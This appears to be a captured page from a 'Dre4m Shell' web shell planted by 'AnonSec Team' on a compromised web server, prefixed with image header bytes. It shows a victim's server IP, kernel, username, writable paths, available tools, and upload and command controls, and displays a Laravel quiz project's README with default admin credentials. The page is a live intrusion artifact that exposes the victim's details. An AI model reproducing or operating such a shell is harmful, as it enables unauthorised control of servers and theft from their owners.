ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.149.254.38
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/websiteAdminUpgrade/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5//websiteAdminUpgrade/README.md

## About MCQS TEST

This project is about MCQS Test. It is developed using laravel framework. The design pattern is based on repository design pattern using dependency injection.

## Installation Guide
1. Download the project and change directory
2. Open your phpmyadmin from locahost and create database 'mcqstest'
3. On the .evn file, set this:
/*
    DB_CONNECTION=mysql
    DB_HOST=127.0.0.1
    DB_PORT=3306
    DB_DATABASE=mcqstest
    DB_USERNAME=root
    DB_PASSWORD=
*/
4. Run 'php artisan migrate' to migrate all the tables
5. Seed initial record into the db by running: 'php artisan db:seed DatabaseSeeder' 
6. Run 'php artisan serve' to run the application
7. Open http://127.0.0.1:8000/
8. Login with: admin@gmail.com and password: 12345
9.  Click 'Assign User to Role' to assign user to a particulary role
10. Click 'Assign Module to Role' to assign the available modules to Admin Role(Create Questions module, Create Options module, All Exam module) and Student Role (Take Exam module, My Exam module)

#You can upload .sql file located in the repos

#Project is ongoing development

Anon7 - 2022
AnonSec Team